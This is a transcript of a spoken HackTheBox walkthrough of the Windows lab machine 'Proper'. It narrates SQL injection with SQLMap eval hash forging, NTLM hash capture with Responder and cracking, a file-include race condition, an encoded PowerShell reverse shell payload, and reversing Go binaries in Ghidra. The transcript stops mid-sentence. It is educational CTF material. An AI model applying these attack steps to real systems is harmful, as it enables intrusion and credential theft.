What's going on YouTube? This is Ipsec. I'm doing proper from HackTheBox, which was a really tough Windows box, not because it had a lot of steps. In fact, there's only 3, but each one of those has something really challenging about it. The first one is a SQL injection into a website, but the challenge is there's a second parameter that is a hash of the SQL query you want to run, plus a secret prepended to it. So in order to automate this exploit, we have to make use of SQLMaps Eval function so it can populate that hash with every single query. Once you dump the database, you get a list of credentials that you can use to log in. And upon logging in, you find a LFI that has the same exact hashing thing. But there is a trick to get it to execute code. It's doing a file get contents on the file and then checking if it has a PHP tag, and if it doesn't, then it passes it to the include. So you have to exploit that race condition in order to get code execution on the box, which you find a client and server GoLang application that you have to do reversing, and reversing GoLang applications is just a pain. So with all that being said, let's jump in. As always, we're going to start off with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it proper, and then the IP address of 10.10.10.231. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open, and that is HTTP on port 80, and it's an IIS web server running version 10, so a recent version of Windows. We can double check that this is Windows by pinging it, so 10.10.10.231, and the TTL is 127, so it is Windows. Generally anything between like 65 and 128, I know it's Windows. Below 65, most likely going to be Linux. And above 128, I'm thinking some type of BSD device or a router or something like that. So we know or have a good idea it is Windows. I am going to do a full port scan, so let's do sudo nmap-p- to do all ports, oa nmap all -ports 10.10.10.231. And the reason why I like doing this is because Windows has a lot of ports that's just not on the default nmap, such as WinRM on port like 5985, 5986, I believe. So this will tell me those things. It's not handy right now, but down the line it may be. So while nmap is running, let's go take a look at the only thing we can, which is a website. So going to 10.10.10.231, we have this page. It is index.html, so we don't really have any way to know what type of programming language the server runs on. Is it ASP, ASPX, PHP, Python? I'm not positive. We could try a few extensions to see what we have, like PHP, ASP, and ASPX. Don't get anything, only HTML. And the fact that nmap didn't say those are robots, I'm not even going to bother trying that because it should have ran that. If you're curious, I got that index.html by clicking the header in the top left. I'm just going to take a look at the page to see if there is any actual links. Where does this go? Not really clickable. So we don't really have that much. I am going to run a GoBuster. So we'll do GoBuster dir -u http 10.10.10.231 -w opt seclist wordlist or seclist, discovery, web content, and then raft small words, lowercase.text because it is Windows. So casing does not matter because it's on the NTFS file system. If I do HTML and capitalize random things or capitalize this E, it all goes to the same page. So we don't have to worry about casing in our dirbust. -o for out file, and we'll just call this, let's see, root.GoBuster. I don't know. We could have given an extension, but we don't know exactly what extension is on this page. We guess we could have tried HTML, but generally, I don't brute force HTML extensions. I don't know why. It's just not something I do. So let's take a look at the web console to see if there's anything else we can get. I like doing this because we may see gets to like a wp-content directory telling us it's WordPress. There's just a lot of information you can get from this. We can see the fave icon is a 404, so the site doesn't have an icon, but it is doing this weird Products-Ajax.php. So it looks like it leaked that it is a PHP web server. And also, this is weird. It's got a query. We can see order equals ID plus DESC, which is like sort in a decrementing order in SQL. And then this H equals something. So I'm just going to copy this URL and we're going to try browsing to the page. We get parameter missing or malformed, so let's go and copy all the parameters and see what this gives us. It looks like it's giving us this piece of the web page. So we can try sorting it by ascending order instead of descending, and we get forbidden tampering attack detected. And at the minute right now, I'm guessing this H stands for hash, and it's doing some type of secure hash on this parameter. So if we echo-n, that looks like 32 characters, but we can check. Yep, 32. So probably MD5 some. What is happening here is the website's doing some type of secure parameter, and all the links that it gives, it's going to do a hash of the order, and then some secret only the web server knows and puts this here. So that way it can know if the user modified anything, because the user's not supposed to be editing parameters. We can take a look at like just removing things and seeing how it behaves. We get a parameter missing or malformed. If we try putting like just 0 here to see what happens, nothing. We can just try fuzzing this and see if anything happens. This is tampering attack. Probably the best way to fuzz this is using fuff. So we can do fuff-u and then fuzz, and I'm going to do fuff-h real quick. How do we do it? So -u, we probably want to put this in single quotes, and then -w for word list, opt sec list. Then we can go to discovery, web content. Is it like a fuzzing thing instead of discovery? Yeah, fuzzing and special characters. This is the one I really like using. It's going to test all the special characters against this. If we spelt fuff correctly. We probably have to... No, I don't think we have to do this header, because this is a GET request, and that header, the content type, is only required for a post request in fuff, so the issue is somewhere else. I'm guessing the page we're getting is something different than that. So what I'm going to do is a curl request, and we can curl this entire thing and see what happens. Badly formatted. I wonder if URL encoding. Okay, that's what it is. So now if we do a -v, we get a 403 forbidden. So that's what we want. So do this plus ASC fuzz, and still not it. I wonder if we do http://. There we go. Fuff for some reason needed HTTP. So all these things are giving us 5 words. And if we go back here, where's that curl? 1, 2, 3, 4, 5. So this is exactly what we're getting. Chances are we don't have to fuzz this one parameter. So the next thing we want to do is see what happens if we just don't submit it. So I'm going to open up Burp Suite. And we're going to send this request there and play with it, because it's a bit easier to visually see if we use the repeater tab. So I'm going to send everything to Burp Suite, maximize this. My proxy intercept is on. Let's just Control-Shift-R, send, and we do this, we get tampering attempt detected. So if we, wait, oh yeah, because we're just doing ID ASC. So if we go back to what the legitimate one was, let's see. That was over here. Let's just copy this hash and see what this page looks like. H is equal to that. DESC was the default. So this is what that page looks like. If we just get rid of the hash and send it nothing, parameter missing or malformed, I'm going to try some type of type confusion attack. and we still get nothing. Let's just try that. And it looks like if the hash is missing, we get some type of stack trace. So this is common in like PHP files, and I notice it a lot in like reverse shells. So if we make dir dub cd dub v test.php, and we do system request is equal to ipsec, and then close this, we have to put a PHP tag. I don't want that. There we go. So php-s localhost 80 sudo, and if I go to localhost now, let's turn burp suite off. Localhost, we called it test.php. Let's see. Error messages aren't being displayed on the web server, but if we look at the error message here, this is what it would have said if we're in like debug mode. Undefined variable request. So whenever you use get variables or variables from the user, always make sure it is set before trying to reference it, because if you try to reference something that's not set, you get an error message. And if your server is in debug mode, then your error messages will go to the user. If it's not, then they'll just go down to probably verilog, apache2, error.log, or wherever your PHP errors go. So we have this, and it's got this secure param salt. So I'm going to try to figure out how it hashes this. So we know the legitimate hash is going to be, let's see, A1B is what we want to get to. So I'm going to do echo-n, and we're going to say ID DESC, and then paste the hash. And we can do MD5 sum, and it's not A1B anything. So that's definitely not it. We can put the hash on the other side of it. And this looks exactly like what it is. I tried this end first, mainly because this is vulnerable to a hash length extension attack as well. It may be a bit tough to pull off in the URL, but essentially how hashing works is it goes in blocks and like hashes each thing. And since we know the last block, we can just continue on and generate hashes from this without knowing the secret. If the secret's on this end, then because we don't know what the last block of hashing was, we can't just continue it. If you want a video of actually exploiting the hash length extension attack, just go to ipsec.rocks, and I'm sure it is here. Yep, right here, using hash puppy to perform the attack. So I'd watch that video if you want to know more of it, but we don't have to do it because we already know. We can validate this by saying ascending order, and let's go back into Burp Suite, or we can do it in a browser actually. So let's copy this, paste, and we start with RAM, and we end with shredder. So I'm going to guess if I change this to ascending order, the shredder's going to be on top, and the RAM's going to be on the bottom. And that will verify that we did this. There we go, shredder's on the top, RAM's on the bottom. So what's left now is building a script to exploit this. What I'm actually going to do is use SQLMap to generate this hash for me, which will let me then just use SQLMap to exploit this whole thing. We could now go and create a program to run manual SQL queries, but let's do it in SQLMap because this is a little known feature. And it should be noted when I did this box for the first time, I had done it the manual way like I did in CrossFit 2 last week, and that's just creating a Python terminal application and writing all the SQL queries by hand. But since I did this box, I did the SQLMap HTTP Academy module written by the creator of SQLMap himself, and there's a really cool feature if you go to the bypassing web application protections section that shows the -- eval flag, and this lets us run some Python code to change what the actual variable is. And here it's actually doing pretty much the same thing with an H equals. So this is somewhat used in actual applications. So it's inputting hashlib and then just MD5ing ID. So I'm going to copy this code and we're going to go back to our window, then copy the request from Burp Suite to a file so we can use it with SQLMap. So copy the file, call it Products-Ajax.php, or not .php, I want .request. So let's fix that real quick. And then we can do SQLMap-r, this file. I have the hash in the clipboard, there's the eval. So let's do hashlib. The parameter we want is actually going to be order. But first we have to specify this plus order. So we send this and it says an error while evaluating the code. Name something is not defined. Let's change this to single quotes because I actually put double quotes here, so that was probably the issue. Type error, Unicode objects must be encoded before hashing. Let's just encode this then. Can't concat string to bytes, so let's encode this as well. And it looks like it's running. So it's going to be trying some of, see, it looks like it's MySQL. Yep. I probably should have did -- batch so it doesn't ask me all these questions, but there's not too much for us to test anyways, so let's just let it do its thing. I guess we could try like manually running a union injection, but we'd have to manually hash a few things, which is just painful. So let's see what this does. It's telling us the order parameter is vulnerable. Do I want to keep testing others? Nope. And it gives us here. So it is doing a Boolean-based injection and time-based blind. So maybe union was not vulnerable. We can do a -- dump. And then I can also specify threads to 10 to make it go a bit quicker. And it will begin dumping the entire database. So looks like the database's name is cleaner. And now it's dumping the customers, licenses. Yeah, it's just dumping a lot of things. I'm going to look back at the Go Buster we ran, and there is a /licenses directory, which was a table name. So I'm going to go back over to the box, and we're going to try /licenses to see exactly what this is. And it says, please log in with your mail address and password. So if we had found this, we could have tried SQLMap here. We can just do basic injection to see if anything works, but no point in that when we have something here. So we got this username and this hash. I'm just going to Google that hash to see if there's anything. Maybe instead of Googling, we can go to hashes.org. What? Is that no longer a thing? Hashes.org. Let's Google that. Maybe it's down right now. We can just go to CrackStation, I guess. I wonder if that site went away. It'd be a shame. That was like my favorite place to go to check hashes. So we get that it is a MD5 sum of password 1. What was that username? Come on. Vicky Solomon. So we can just try this. So copy. And then we go over to licenses. And its password was password 1. And I want to just go through Burp Suite because whenever I look at login parameters, I just like seeing if there's like CSRF tokens and other things. So we log in. And it doesn't look like there's any protections. It's just straight username and password. PASSWORD. Password 1. There we go. I must have typoed it. But we have just licenses and a logout, license portal. There's nothing really we can do with this. we have this one directory and licenses.php, so we should be running a GoBuster. So what I'm going to do is say GoBuster dir-u HTTP. I did HTTP twice. And then we can say -x for extension, PHP, -w word list, opt, sec list, word discovery, web content, RAS small words, lowercase .text, -o, licenses.gobuster. So let's see. Server matches non-existing. Ooh, what? Oh, because I'm doing license.php. We can get rid of that. Just go in this directory. And here we go. Index, logout. You can see other directories. It's still dumping hashes here. But we do have this. So we can change the theme. And that gives this parameter. And it goes solar. And then flatly. And then darkly. So whenever I see this, I want to try to find how this is working. So the very first thing I want to test is like darkly.php. And we get a 404 not found. I'm going to try like, is there a themes directory? So themes, we don't have anything. If I do darkly, we get 403 forbidden. Before it was the 404. So there is a directory darkly. I'm going to try flatly. So let's just do directory is equal to flatly. And that is a 403 as well. So off the bat right now, we know this theme directory, what this parameter, what this theme parameter is doing is it's going into a directory and then probably including a file. We don't know what file it is. We can try putting ... and we get this tampering detected. So I have a feeling we have to do the hashing thing again. But since that, it's accepting user input at the start. So it's, let's say, LFI function. So we could do like file get contents. It could also be an include, but it's putting our parameter here. So our param, and then it's appending something. And it doing this appending is going to make it difficult for us to get files. I'm guessing it's doing more than just appending .php, which is what most of these things do. And if all it does is append .php, then we can work with this because we can just say, okay, we're going to make our param equal to PHP filter convert, do a magic, I think it's convert .base64 I think. And then resources equal to our parameter, which we just put the file name like index and then let it append this .php for us to get this thing working. We can't really do this because we don't know exactly what it's appending. It's appending a whole file name. So it's could be appending like theme.php. So if we do index, it adds theme.php and that's a 404. So this is why I'm not going to go into the PHP wrappers too much because based upon my enumeration, this is probably what is going to happen. Before we can actually do anything though, we probably should just create a Python application so we can do this LFI. So I'm going to do v inject.py. And it's time to do all our includes. So we know we need hashlib to generate the hash, and we need Python request to make web request, and then cmd, which will give us our terminal application. So we do class term is equal to term cmd. Prompt is going to be equal to please subscribe. And then we need a default function. And all I want to do is test this, so we'll just print args, and then let's create an exit. And all this does is return true. And we just have to execute this. So term is equal to term.cmd loop, Python 3, inject.py, and it works. Awesome. So the very first thing we have to do is create our hashing algorithm. So I'm going to create a function. It's called secure_param, and it'll just accept, I guess, arg. I'm going to say hash is equal to hashlib.md5, and then salt is equal to, let's go back to burp suite, repeater, grab this. Then we can do hash.update args, or actually salt plus args. And then we want to encode them. And we can return hash.hexDigest. So here, instead of print args, we can print secure_param args. Come on, there we go. And fix this typo. Run it, and we can do darkly. Args is not defined. Do what? Oh, I don't have it plural here. Arg. Darkly. Okay, 9AA. If we go back to the license page, darkly is 9AA. So we did this correctly. The next thing we have to do is have our application log in. So I'm going to create another thing. So this will be def auth self. And we can say self, actually, let's create initialization now. So whenever the terminator, let's say terminator, whenever a terminal starts, we need to generate some variables. So self.s is equal to request.session. And what this is going to do is just remember a cookie and handle all that for us. And then we want to call what is left in this with the super call. So this is a function within the term module. And if I override this function, then what it normally has isn't going to go through. So that's why at the end of this, I do the super thing, which is going to say, okay, now go through your default initialization as if I did not override you. Hopefully that makes sense. So this can now be self.s.get. Let's define URL. So URL is equal to HTTP 10.10.10.231. So self.get URL. And all this is going to be doing is initializing our session in case we need to like make a request before we send a post. Sometimes like your GET request generates the PHP session for you. Then we do creds is equal to. We have to get the credentials we used. So we can probably go to proxy, history. It was most likely a post to licenses, and it was password 1. So this is it. I'm going to do Control-Shift-U to URL and decode this. And this is going to be username is equal to that. And I don't know why I copied the wrong one. Password is equal to password 1. That looks good. And we want self.s post URL plus / licenses. And then data is equal to creds. And there's going to be the post request. So here we can just do self.auth like this. And this session should now be authenticated. The one thing I want to do, it is doing licenses with the / here. So I want to have that. And for this default now, we can say salt is equal to this. We've already verified that is correct. And then we can do, what is the parameters it sends? It's actually a GET request. So this can be r is equal to self.s.get fstring http 1010 or let's see, URL plus / licenses / I think licenses.php. Licenses, yeah, we can just copy this actually. What? Could have swore I copied more. Cut. There we go. Having two clipboards always choose the wrong one. It's like plugging in a USB. So this darkly, we don't want that anymore. We want this to be args. And this H to be salt. So now we should be able to include files. So print r.txt. So Python 3, inject.py. And what we're going to do is try RFI. The SQL map, do you want hashes? Yes, yes. Sure. Let's go back to our www directory. I'm going to remove that test.php we did because I don't want code execution on my box. We can say http.server. Port 8000 is fine. So we can try including something. So let's just try http / 10.10.14.8 and see what happens. I not specify 8000. And we see the web server makes a request on, appends header.inc. So if we created that page for us, so let's do www v header.inc, and we can test something. So I'm going to do echo, please subscribe. And I always start with something simple when I do a file include because like PHP could be in safe mode, which would block system, it would block PHP info, things like that. Actually, safe mode's deprecated, I think. They may have just blacklist a bunch of those functions that could be dangerous. And yes, even PHP info is blacklisted, but echo almost never is blacklisted. So that's why I always test out with this first. And when we try to execute this, it will make a request to us and then say forbidden tampering attempt detected. So it looks like if this file exists right now, it will error. I'm just going to get rid of the PHP tags and try it again, and we get a page. So it does not like being in PHP. I'm going to try, we can maybe just do $caret like that, and then do it again. Tampering detected. I'm just going to do a caret, and it actually works. So it looks like it is definitely related to doing PHP tags. So the next thing I want to do is see if it actually included the file. So I'm just going to go up, and we see some type of stack trace. So what is it doing? I'm going to actually just copy this, clear, put a bunch of lines, and we'll try it again. And I did this so we can get exactly where the first line is, because there's multiple stack traces, and I just wanted to make sure I was reading them one at a time. So let's see. On line 36, it's doing a secure include. Looks like all of these are secure include. So maybe it's the same error 3 times. We have it doing a file get contents, searching for a PHP tag. And if that doesn't exist, it attempts to include it. And then it will die. So it looks like falling secure whenever we execute PHP tag. Same exact thing. So I'm not sure why. Oh, right here. HTTP wrapper is disabled. So we can't use the HTTP wrapper. However, we can probably abuse UNC paths because it is indeed Linux. So I do / / 10.10.14.8, and let's get rid of our web server. I'm just going to sudo nc lvnp 445, and we can say directory / file. The server makes a request back to me. So we know we can potentially abuse SMB. What I'm going to do is run impacket. So impacket responder. And it's been a while since I actually ran responder, so let's get whatever the default arguments are. -wrf. And we want to run it on ton 0. So responder -i ton 0 wrf. Run it with sudo. I is capital. Shoot. Let's see. Responder has some error. apt install responder. Pip3 install. Let's see. Actually, let's go GitHub responder. And what happened here is on my machine, I installed multiple versions of Python. So we have Python 3.8 and 3.9. And I'm guessing it's using the wrong version of Python to execute responder. But we should be able to install it manually. Does it have instructions? Usage, acknowledge. Okay. So let's go and opt git clone, cd responder, git pull. Let's just delete responder. Sudo git clone. Okay, and we want to do Python 3 -m venv, and we'll create it in .venv. Source.venv bin activate, and we can do pip to probably install this. I don't see a requirements.txt. Let's see. Python 3 responder.py. Sudo -i ton 0. Huh, looks like it's working here. Let's just do wrf, and it's listening for events. So that was easier than I expected. So let's do inject.py and 10.10 14.8 / oh, I hit enter too early, but it looks like we did capture something. So we have a hash right here. So what I want to do is see if we can crack this real quick. So v hash, this is a net NTLM v2. So we can do hashcat-h. Let's see. -- example hashes. Net NTLM v2. 5600. So hashcat-m 5600. Then we give it the hash file and then the word list. And we're just going to use rocku. So user share word list rocku.txt. And I'm going to do -- force. And, oh, unknown CPU generic. What is the fix to this? I think I actually have to install like the OpenCL runtime on my host, which don't want to do now, and my Kraken is offline. So I guess we can do John. So let's do John hash dash dash word list is equal to user share word list rocku.txt. And did I get that file path right? Looks like I did. So we got the password as Charlotte123 bang. And that is for the web user. So what we can do is go into an nmap directory and cat all ports.nmap, and we don't have anything listening. This is where I test like winrm and smb auth to see if we have any file shares, things like that, but there's nothing we can really do except try to include another file. So I'm going to kill this responder window, and because SQLMap is being annoying in that pane, I'm just going to go to a new one, and we're going to try including a file over the UNC path. The issue is the, let's see, notes.txt. The web server is doing a file get contents and then looking for this. And if it finds that, it exits. If it doesn't find that, then it's going to include that file. And that's actually 2 times it's accessing the file. So there's a race condition here. Exists. Oh no, it does exit. If it's in, then exit. So if we give it the file and then the server sees, oh, there's no PHP tags in it, it's going to include to access the file again, because that file gets contents wasn't writing it to a directory. If it wanted to be a bit more secure, it would do a file get contents around the file, assign it to a variable, then like write that to disk and then do an include on that, or do an eval on the variable. But because it's actually requesting the file twice, we can potentially replace it after it does this file get contents, and then it will include the modified file. Hopefully that makes sense. And if it doesn't make sense, maybe it will after we do this. In order to abuse this race condition, I'm going to install an application called inotify-tools, which I think it already exists on my box. It does. And what this allows us to do is create like hooks into a file system to monitor files. So if I do inotify wait on, let's just do touch test. It's now waiting, and I'm going to cat this file, and it tells me it opened it. You can also do on events. So if I do man inotify wait, and we look at events, it's got multiple ones. So we could just do inotify wait -e close on test. And then if I open up test, I guess vim opens and then closes. Let's do Python 3 f is equal to open test. It's not doing anything because the event is watching close. So I do f.close, and we can see it ends there. So this helps us because we can do an inotify. Well, let's actually make dir smb, and let's build a malicious payload. We want to send probably a reverse shell. So I can go cp user share nashang, and then shells invoke PowerShell TCP oneline.ps1 to copy it to my current directory. And then let's v. We have 2 reverse shells that we can use. I typically always like just using the top one. I'm not sure why. It's just what I do. Let's replace this IP. So this will be 10.10.14.8, and the port's going to be 9001. Then the next thing we want to do is convert this into base64. Alternatively, we could use a web cradle. So that would mean a PHP script that we execute on the server makes an HTTP request to a server to download the script with IEX, new object, whatever. If I don't have to use web cradles, I typically don't because it just adds another request and the IEX payload can get caught. It just looks suspicious. So let's cat invoke PowerShell whatever. And before we convert it into base64, we have to turn it into UTF 16-bit little endian. And it's iconv-t for -2. And all this did, if we XXD it now, we can see everything takes 2 bytes. And in this output, you see a period before everything or a period after everything because it takes the 2. If we didn't do this iConvert, it looks like this, just standard ASCII. So this is how it wants it, and then we do base64-w0 for wrapping 0 to put this whole base64 thing on one line. If we didn't do that, it would look like this. So now that we have this, we can create pwn.php. And what we want to do is system, and then we can say PowerShell-NOP for no profile, -w for window, we make it hidden, and -enc for encoded command, and we just paste our base64 string. So now we should be able to stand up our SMB server. So I'm going to do sudo smb server.py, and then we'll do -smb to support -username web -password was, I don't know why I put a slash there, Charlotte 123 bang, and this came from that SMB thing. And then we give it a share name. I'm just going to call it share, and then the working directory of our thing. So we have that listening. Let's do nclvnp 9001. And let's make a request to the file. So if we just went to 10.10.14.8 /share / that's all we do. We don't have to do a / there, I think. Because it's going to append /header.include. So let's just echo, please subscribe to header.include. So when we get this, it should respond with please subscribe at the very top of the page. So let's go up, and we have indeed, please subscribe. So now we just have to exploit the race condition. And this is where we use that inotify wait thing that we talked about. So inotify wait -e close header.inc sleep 1, and then we'll copy pwn.php over top of header.inc. So the wait's established. Let's get this again. We can see header.inc closed. It copied over pwn over top of this, and then it includes it, and we get a reverse shell. So there's one thing I forgot to do, and I always like doing RL wrap when I do reverse shells on Windows. So let's do that again. So I'm going to overwrite header.include, or header.inc, whatever you want to say. Go back to this inotify wait thing. Send it again. And wait another second or two, and we should get this shell. And now that I'm using our L wrap, it's read line wrap, we have the up and down arrows. So we're on this box. We could go to users and then web, I guess. That's who we are. Desktop, and get user.txt. If we explore this box around, I'm going to go into program files. I always like doing progr1. This is going to get into the very first directory, and then progr2 would get into the second. It's just shorthand for writing program files. Forget what Windows calls it, maybe short path. It's an old DOS thing. Actually, progr2 did not bring me where I thought it would. The main reason I use that is I always hate spaces because I type this and then realize I have to go back and put it in quotes. So that's why I use those squigglies. So inside of program files, we have this nssm.exe, and I know this from just like creating challenges. This is an easy way to turn executables into services. It's like non-sucking service manager or something. If we go to Google, nssm, maybe service, and let's see. Yeah, the non-sucking service manager. It's the funny name. When I first saw it in a CTF, I thought it was a joke, and then I Googled it. I was like, oh, this is an actual application. But that's one clue that's running some type of custom service. We may be able to do like get services. That didn't work. Let's see. What's the command? cmd list services. Windows. I'm getting better at auto-Googling by hitting the down arrow. Display from command line. Net start. That's what I was going to do. cmd/c net start. So it looks like we don't have permission to view services. There's probably a wmi command we can do that does it. Let's see. wmi cmd list services. Starting and stopping. I've always had better luck at getting services through using wmic. But the command isn't obvious. So I'm just going to go into, let's see, we got a few directories. There is a cleanup directory. So if I go into cleanup, we have client.exe, readme.md, and server.exe. So if I type readme.md, we have just thing, we find garbage on your system and delete it. Alpha release, create an awesome GUI, check for additional paths. So I would guess server.exe is running as a service, probably set up by NSSM. I don't think that's a huge leap to go off of. And if it is running as a service, it's probably going to run as the system user, which is like administrator. So we want to download both of these files. So I'm just going to copy client.exe, and we can copy it over to our SMB share. So it was share / yeah, we just have to do share. And this should work because, yeah, we already have all the credentials and everything. So let's do server.exe. So we have these two files, and I'm actually going to host this through our HTTP server so I can access it from a Windows box, which will let us do some reversing of this a bit easier. Actually, before we do that, we can open it up in Ghidra and see what we see. So let's do opt Ghidra run, and this should start it. I have updated to the latest version just before doing this video, so you may want to update your Ghidra. It does these things like really weird, or these things being Go binaries, as we're about to find out once we import it. If we import, let's say, client.exe, and let it do its thing of analyzing it, we'll see how GoLang behaves. And I don't have a lot of experience in reversing these binaries, but if you just do like a hello world, it's going to create like 2,000 plus functions because GoLang itself is just bloated. It is pretty much a static compile, so it puts everything it needs in the binary and makes some really big things. So makes it a bit harder to reverse. If we open this up in Cutter, it wouldn't do anything about parsing the function names, and you'd just be left with like 3,000 functions to go sift around. Thankfully, Ghidra's a bit better and can do some parsing. So we can look, we have main, so it probably starts here. And we can see the binary. There is a plugin that I'm going to use that will make this a bit better. The main thing that it's going to do is, let's see, I think put arguments here. So whenever it does a syscall, it'll be smart enough to know the arguments. Let's see, is there one here I can show before we switch to the plugin? Just looking around. So like it's doing this print line and then it's just blank and everything is undefined, or this one actually gets the number of arguments. But once we install the plugin, it'll be a bit better. So let's close out of Ghidra and then close out of this. Go to Firefox and we can Google Ghidra reverse plugin. Tell it to Google. Reverse GoLang plugin. This GoTools thing. And the main issue here is it's compiled based upon Ghidra version. If you go to like the closed issues, you can see it doesn't work with Ghidra 9.1. And the author says you can just use Gradle, which is like a Java package management thing, I guess, kind of like pip maybe. I'm not 100% positive how to explain Gradle, but essentially it's a make file for Java. I guess I just explained it. Being on the spot sometimes is hard. So I'm going to go here. We're going to clone his repo. And we can go in GoTools. And there is a build.gradle. And it has instructions. It says gradle-p Ghidra install directory in the absolute path of Ghidra, because it's going to include headers for that specific version. The issue if you install it from apt is Gradle is super old. I'm not sure if this is like just not updated, or when I did apt install Gradle, it just picked something bad. But it's Gradle 4, which will give us issues. So if we do opt Ghidra, we're going to see it fails to build with this issue. If I Google this line, it'll tell me that this was included in Gradle version 5. So let's go here, search this, discuss. And yeah, it's Gradle 5, but we're using 4. So I Google for download Gradle. And we can just manually install it. So where is the package? Additional release page. And then download binary only. Copy link. Let's see. Go here and get this direct link. And I'll do opt. And we'll wget this. I always like putting URLs in quotes, even though there it wasn't needed. And we will make dirt Gradle, copy that zip in there. And this is just habit. Whenever I unzip things, I always like trying to unzip it in a clean directory in case they don't bundle the directory with it. It looks like in this case they did. So we can just move everything Gradle 7.2 here and remove the Gradle 7.2 directory. And we have a clean instance of Gradle here. So let's go back into a GoTools program. And instead of doing the Gradle on our system, we can do opt Gradle, then bin Gradle. And now it's going to, did not compile. Let's see. Pretty sure this is what I had done before. Let's see. Gradle, we can do -v for version. It is 7.2. That is good. Ghidra install directory. ls opt Ghidra. That's where it is. Run with stack trace. Plugins. So it looks like it's missing this. Home ipsec Gradle 7.2. It expects Gradle to be in my home directory. Not exactly sure why, but let's just copy it there real quick. Opt Gradle and then Gradle 7.2. The very first time I did this, I had extracted Gradle to my home directory, so maybe there's some old config or something I didn't wipe. That's my only guess. So let's specify the path it's looking for. There we go. We're still in GoTool. Oh, No. Did I just get rid of it? Okay, let's do that again. Gradle, bin, Gradle. So, see if it compiles here. It looks like it is. So that was the issue. The first run, I would recommend trying to put it in op so it's not in a home directory, but if it complains, look at that error message. So now we have it built. We can go in dist and we have the Ghidra plugin. So we can copy that into opt Ghidra and then extensions. And you want to go opt Ghidra extensions. If you do opt Ghidra, then Ghidra extensions, it's not going to work. I don't know why this second extension directory exists, but that is an issue. So now we can do Ghidra run and install the plugin. So file, install extension, and select GoTools. And that says, please restart Ghidra. And I'm going to clean up the directory I made. So the first time I ran Ghidra, I created a new project and named it Go. So I was just deleting that. So now we can create this. We'll name this, I guess, temp, and I'll call it proper. We can open this, and then when we parse the binary, we just tell it it's a GoLang binary. So exe, right here, it's defaulting to Windows. Now, because we have the plugin, we can specify GoLang, and we'll just do all the default analysis. And it's going to look mostly the same, but some of the decompiled output is going to be a bit cleaner. If I can remember what I showed before, we can look at it. The other super weird thing about GoLang binaries is strings don't terminate by null bytes. They're always in some type of serialized formats that will include the location and then length of the string. Maybe that'll make sense later, and maybe I'm wrong by that explanation, but just one of the things me and OXDF noticed when doing this challenge. So we can go to functions, and again, looks the same. We go to main. Let's look at main.main. And what did we show before? This OS current. Before it was undefined. Is it still? Looks a little different. But let's go to main.clean. Convert to string. We got this printf. Before it was just open and closed. Now it's giving us a lot of data. And it's still not great because it's like got this whole junk string. And that's mainly because Ghidra's expecting it to be terminated by a null byte, but it's not. C, that is, let's just open up Python real quick. 0xc, that's 12. I wonder if this is 12. 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12. So right here, we can see this is going to be size. I don't know exactly what, but I'll name it size question mark. There we go. And 0xc, this is 12. And cleaning %s, that was 12. So this printf is going to print the first 12 characters here. Oh, 0xc is here. I don't know exactly why it does both or what this one is used for. We'll put more question marks around that because we're not sure. But yeah, GoLang binaries are just weird. At least it's easier to parse now than before because this didn't used to be it. Actually, I can show you how it used to look. Let's just open up Cutter, and like last year or whenever, this is what debugging Go binaries used to look like. So we can analyze it, and once this is done, we can look at all the functions, and you'll probably laugh. Like, yeah, here it is. Good luck analyzing this. Like, where is main? I have no idea. There's just so much stuff. We can probably find main now that we know. We're actually opening the client and this is the server, but yeah, it's just painful. So highly, highly recommend using Ghidra for this and installing the plugin. So where was I? We want to kind of analyze this thing and see what clean does. We could just run it on our host, but before we do that, we should at least look a little bit into here. This is where I like having multiple monitors because both the disassembly and decompile output is super handy and it's a pain to jump between them. So here's the main function. Right here, it's saying if long this is less than 2 and then setting things. I'm going to guess this is the argument counter. So we're going to say arg c. I don't know the proper way to type that, but that's my guess here. And then we got 5, which may be a length. And then this string, I don't know what this is. I'm going to click on it. And we see it says clean. So chances are this pointer is clean. Let's just double check that. CLEAN. Yep. And this is 5. Clean is 5 letters long. So again, it's keeping that same format of length and then string. Here, we're going to something plus 0x18 is equal to 2. And I want to say this is going to be length. And then this will be a pointer to the string. So let's just rename this to be, I'm going to say argv. All these names may be wrong. Again, whenever you do analysis like this, be prepared to rewrite things. And I'm going to set a plate comment before, and I'm going to say, actually a pre-comment. Let's see, what do we think this is? Second arg length. Apply. So we kind of have an idea there. It's doing 2. And then right here, it looks like it's the pointer to the string. And then 522D. So this looks like it is hex. If I just do like man ASCII, we can look at 2D. 2D is a dash. And the other one was what, 52? Let's search for 52, find out what it is. Looks like capital R. So hex 52 is capital R. So this is, we can do semicolon dash R. So if the second argument is dash R, then local 58, this is probably going to be a size. So we go here, and this is weird. We have RE. So I'm going to undefine this stuff. Let's clear code bytes. So at the start here, we're now 4 characters. I'm going to go here and to the next one and hit C as well. Let's see, REST. Oh, there we go. I was just undefining bytes. I don't know how to make this say it is 7 characters long. It looks like GoLang storing it as 2 different variables, or not GoLang, Ghidra is, but this is restore. So we can name this one restore. So looking at this code right now, it's going to execute. It's going to look at arguments, and if the second argument is dash R, it's going to execute the restore function. Otherwise, it's going to execute the clean function. Here we're pulling a username. I don't know exactly what these variables are. We have argc here. Right here it's doing main.clean. Somewhere right here it's doing main.restore. So let's look at main.clean to see what this looks like. This is where we have this big printf, and we already talked about that being the size, so it really is only writing out cleaning %s. Then it's going to read directory. We don't know what that's reading. We can go to this dat. Let's see, that's just a move something. I don't know exactly what this is. Something here, not sure. Converting something to string. Oh, it's looking at time. So we have a call to time. and then OS stat. I'm guessing this one is wrong and this is really the file name it's trying to stat. And then there's a if this is less than this minus something, do this. And just based around all these time things, let's see what this value is. So let's go back to Python. Do I have it in this down pane? Oh, up here. That is 162,000. Actually, I cut off a 0. It is 259,2000. And I'm going to guess this is seconds. So this is a big leap. If you do a lot more time reversing, it would probably make sense. But in this short video, we're just making leaps because we see it doing a bunch of time functions, time.now, OS stat on a file. So you may think it's seconds, and we can see that is 30 days. So it's doing something, and if the file is older than 30 days, call main.service clean on it. So what we have to figure out is how it's pulling files. It was, before it calls this, doing something with user, and it's reading a directory here. So I'm thinking maybe the directory is stored in the main function. So let's go back there. And I haven't really troubleshooted or reversed it to this level because I was doing a lot more dynamic reversing when I did this box. Let's see, main clean, current user. I don't know where it's getting the directory, but let's just execute this program. I've already copied it to a Windows 10 machine. I have client and server.exe. So if I run server.exe, just going to open up a command prompt. Let's open another one and run client /client exe. And it says it's going to be cleaning c:\users ipsec downloads, and then doesn't do anything. If we had a file that was 